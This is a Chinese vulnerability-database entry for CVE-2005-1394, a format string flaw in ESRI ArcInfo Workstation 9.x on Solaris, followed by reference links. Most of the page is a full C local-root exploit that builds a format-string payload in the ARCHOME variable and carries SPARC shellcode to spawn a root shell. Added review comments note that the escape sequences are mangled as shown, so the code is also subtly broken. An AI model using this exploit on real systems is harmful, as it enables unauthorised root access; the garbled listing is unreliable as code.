ESRI ArcInfo Workstation多个本地缓冲区溢出及格式化字符串漏洞
漏洞ID | 1108733 | 漏洞类型 | 格式化字符串 |
发布时间 | 2005-04-30 | 更新时间 | 2005-10-20 |
CVE编号 | CVE-2005-1394 |
CNNVD-ID | CNNVD-200505-877 |
漏洞平台 | Solaris | CVSS评分 | 7.2 |
|漏洞来源
|漏洞详情
ESRI ArcInfo Workstation 9.0 的 ArcGIS 存在格式化字符串漏洞，本地用户可以通过在传递给 (1) wservice 或 (2) lockmgr 的 ARCHOME 环境变量中的格式化字符串限定符来获取权限。
|漏洞EXP
/** ESRI 9.x Arcgis local root format string exploit
**
** Copyright Kevin Finisterre and John H.
** Bug found by Kevin Finisterre <[email protected]>
** Exploit by John H. <[email protected]>
**
** We overwrite the thr_jmp_table
** Tested on solaris 10
**/
#include <dlfcn.h>
#include <fcntl.h>
#include <link.h>
#include <procfs.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/systeminfo.h>
#define VULPROG "/export/home/arcgis/arcexe9x/bin/wservice"
#define NOP "xa2x1cx40x11"
/* Index into targets[] chosen with the -t option (set in main via atoi). */
int iType;
/* Per-target parameters: two addresses consumed by main() and a label that
 * usage() prints.  `v` is an unnamed instance of the same struct type used
 * only as a sizeof operand to obtain the element count
 * (sizeof(targets)/sizeof(v)). */
struct
{
unsigned long retloc;
unsigned long retaddr;
char *type;
}targets[] =
{
/* bash-2.05b$ nm /usr/lib/ld.so.1 | grep thr_jmp_table
0003a234 d thr_jmp_table
*/
{0xff3ea234,0xffbffba8,"SunOS 5.10sun 4u sparc SUNW"},
{0x41424344,0x41424344,"DEBUG"},
},v;
/* Shellcode taken from netric; the trailing comments are the author's
 * per-instruction SPARC annotations.  Passed to execve() as env[0] in main().
 * NOTE(review): as rendered on this page the escape sequences in this
 * literal (and in the printf format strings in main() and usage()) have
 * been mangled, so the listing as shown does not compile to the bytes the
 * annotations describe. */
char shellcode[] =
"55"
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
// setreuid(0,0);
"x90x1dx80x16" // xor %l6, %l6, %o0
"x92x1dx80x16" // xor %l6, %l6, %o1
"x82x10x20xca" // mov 0xca, %g1
"x91xd0x20x08" // ta 8
"x90x1dx80x16" // xor %l6, %l6, %o0
"x92x1dx80x16" // xor %l6, %l6, %o1
"x82x18x40x01" // xor %g1, %g1, %g1
"x82x10x20xcb" // mov 0x2e, %g1
"x91xd0x20x08" // ta 8 [setregid(0,0)]
"x21x0bxd9x19" // sethi %hi(0x2f646400), %l0
"xa0x14x21x76" // or %l0, 0x176, %l0
"x23x0bxddx1d" // sethi %hi(0x2f747400), %l1
"xa2x14x60x79" // or %l1, 0x79, %l1
"xe0x3bxbfxf8" // std %l0, [ %sp - 0x8 ]
"x90x23xa0x08" // sub %sp, 8, %o0
"x92x1bx80x0e" // xor %sp, %sp, %o1
"x82x10x20x05" // mov 0x05, %g1
"x91xd0x20x08" // ta 8 [open("/dev/tty",RD_ONLY)]
"x90x10x20x02" // mov 0x02, %o0
"x82x10x20x29" // mov 0x29, %g1
"x91xd0x20x08" // ta 8 [dup(2)]
"x21x0bxd8x9a" // sethi %hi(0x2f626800), %l0
"xa0x14x21x6e" // or %l0, 0x16e, %l0
"x23x0bxcbxdc" // sethi %hi(0x2f2f7000), %l1
"xa2x14x63x68" // or %l1, 0x368, %l1
"xe0x3bxbfxf0" // std %l0, [ %sp - 0x10 ]
"xc0x23xbfxf8" // clr [ %sp - 0x8 ]
"x90x23xa0x10" // sub %sp, 0x10, %o0
"xc0x23xbfxec" // clr [ %sp - 0x14 ]
"xd0x23xbfxe8" // st %o0, [ %sp - 0x18 ]
"x92x23xa0x18" // sub %sp, 0x18, %o1
"x94x22x80x0a" // sub %o2, %o2, %o2
"x82x18x40x01" // xor %g1, %g1, %g1
"x82x10x20x3b" // mov 0x3b, %g1
"x91xd0x20x08" // ta 8 [execve("/bin/sh","/bin/sh",NULL)]
"x82x10x20x01" // mov 0x01, %g1
"x91xd0x20x08" // ta 8 [exit(?)]
"x10xbfxffxdf" // b shellcode
"x90x1dx80x16"; // or %o1, %o1, %o1
/* Big endian */
/* sparc */
/* Serialise the low 32 bits of `value` into `ptr` as four big-endian bytes
 * (most significant first).  Returns the position just past the last byte
 * written so calls can be chained.  Only the low 32 bits are emitted even
 * on platforms where `long` is wider; the caller must provide 4 bytes. */
char *putLong (char* ptr, long value)
{
    unsigned char *out = (unsigned char *) ptr;
    int shift;
    for (shift = 24; shift >= 0; shift -= 8) {
        *out++ = (unsigned char) ((value >> shift) & 0xff);
    }
    return (char *) out;
}
/* main */
/* Entry point.  Parses -t <index> (and -h), validates the index against
 * targets[], then builds argv/envp for VULPROG and execve()s it.  Returns -1
 * when called with fewer than three arguments, 0 on the help/invalid-type
 * paths, and 0 again only if execve() itself fails (after perror).
 * NOTE(review): usage() is defined below main() and no prototype is visible,
 * so the calls here rely on an implicit declaration (invalid since C99). */
int main(int argc, char **argv)
{
unsigned long retaddr;
unsigned long retloc;
int offset = 23;
int dump_fmt=129;
int al = 1;
int i=0;
int x=0; /* unused */
int c;
unsigned long hi,lo;
static unsigned long shift0,shift1;
char buf[9000]; /* appended to below without any length check */
char *args[24]; /* only args[0..1] are ever set */
char *env[6]; /* only env[0..2] are ever set */
char *ptr;
char padding[64]; /* unused */
char padding1[64]; /* unused */
char buf2[9000]; /* "ARCHOME=" followed by buf; passed as env[1] */
if (argc < 3) {
usage (argv[0]);
return -1;
}
/* Option parsing.  Note the optstring "h:t:" declares -h as taking an
 * argument, so a bare -h falls through to the default case instead. */
while((c = getopt(argc, argv, "h:t:")) != EOF) {
switch(c) {
case 'h':
usage (argv[0]);
return 0;
case 't':
iType = atoi (optarg); /* no conversion-error check (atoi, not strtol) */
break;
default:
usage (argv[0]);
return 0;
}
}
if (argc < 2) { usage(argv[0]); exit(1); } /* unreachable: argc < 3 already returned above */
/* Bounds-check the index; iType<0 is tested first, so the signed/unsigned
 * comparison against the size_t element count that follows is safe. */
if( (iType<0) || (iType>=sizeof(targets)/sizeof(v)) )
{
usage(argv[0]);
printf("[-] Invalid type.n");
return 0;
}
/* Environment and argument vectors handed to execve(). */
env[0] = shellcode;
env[1] = buf2;
env[2] = NULL;
args[0] = VULPROG;
args[1] = NULL;
retloc = targets[iType].retloc;
retaddr = targets[iType].retaddr;
/* Values derived from the selected target entry and the fixed constants
 * declared above; encoded into buf below. */
hi = (retaddr >> 16) & 0xffff;
lo = (retaddr >> 0) & 0xffff;
shift0 = hi - offset - (dump_fmt * 8 + 16 + al);
shift1 = (0x10000 + lo) - hi;
memset(buf,0x00,sizeof(buf));
memset(buf2,0x00,sizeof(buf2));
ptr = buf;
for (i = 0; i < al; i++) {
*ptr++ = 0x41;
}
ptr = putLong (ptr, 0x41414141);
ptr = putLong (ptr, retloc);
ptr = putLong (ptr, 0x42424242);
ptr = putLong (ptr, retloc+2);
for (i = 0 ; i < dump_fmt; i ++) {
memcpy(ptr, "%.8x", 4);
ptr = ptr + 4;
}
/* NOTE(review): these appends are unbounded (strcat/sprintf into a fixed
 * 9000-byte buffer), and "%u" is paired with unsigned long arguments, which
 * -Wformat reports as a specifier/type mismatch. */
strcat(ptr,"%.");
sprintf(ptr+strlen(ptr),"%u",shift0);
strcat(ptr,"lx%hn");
strcat(ptr,"%.");
sprintf(ptr+strlen(ptr),"%u",shift1);
strcat(ptr,"lx%hn");
strcat(buf2,"ARCHOME=");
memcpy(buf2+strlen(buf2),buf,strlen(buf)); /* also unchecked against sizeof(buf2) */
execve (args[0], args, env); /* only returns on failure */
perror ("execve");
return 0;
}
/* Print the banner, the command-line syntax (using `p` as the program
 * name) and the table of known targets as "<index> <label>" lines to
 * stdout.  Always returns 0. */
int usage(char *p)
{
    size_t count = sizeof(targets) / sizeof(v);
    size_t idx;
    printf( "Arcgis local root format string exploitrn");
    printf( "Usage: %s <-t target>n",p);
    for (idx = 0; idx < count; idx++) {
        printf("%dt%sn", (int) idx, targets[idx].type);
    }
    return 0;
}
// milw0rm.com [2005-04-30]
|参考资料
来源:MISC
链接:http://www.digitalmunition.com/DMA%5B2005-0425a%5D.txt
来源:SECTRACK
名称:1013852
链接:http://securitytracker.com/id?1013852
来源:SECUNIA
名称:15196
链接:http://secunia.com/advisories/15196
来源:support.esri.com
链接:http://support.esri.com/index.cfm?fa=downloads.patchesServicePacks.viewPatch&PID=14&MetaID=1015
来源:FULLDISC
名称:20050430 DMA[2005-0425a] - 'ESRI ArcGIS 9.x multiple local vulnerabilities'
链接:http://marc.theaimsgroup.com/?l=full-disclosure&m=111489411524630&w=2